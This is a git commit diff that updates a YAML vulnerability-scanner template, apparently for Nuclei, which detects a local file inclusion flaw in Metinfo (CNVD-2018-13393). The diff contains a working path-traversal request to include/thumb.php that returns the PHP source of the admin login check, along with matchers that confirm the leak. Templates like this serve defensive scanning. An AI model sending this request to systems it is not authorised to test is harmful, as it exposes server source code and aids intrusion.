Update CNVD-2018-13393.yaml

patch-1
Prince Chaddha 2022-04-12 01:26:57 +05:30 committed by GitHub
parent c47bbba975
commit a09755f6b0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 3 deletions

View File

@ -1,22 +1,24 @@
id: CNVD-2018-13393 id: CNVD-2018-13393
info: info:
name: Metinfo LFI CNVD-2018-13393 name: Metinfo LFI
author: ritikchaddha author: ritikchaddha
severity: high severity: high
reference: https://paper.seebug.org/676/ reference: https://paper.seebug.org/676/
tags: metinfo,cnvd-2018,13393,lfi tags: metinfo,cnvd,cvnd2018,lfi
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php" - '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
redirects: true redirects: true
max-redirects: 2 max-redirects: 2
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "<?php" - "<?php"
- "login_met_cookie($metinfo_admin_name);" - "login_met_cookie($metinfo_admin_name);"
condition: and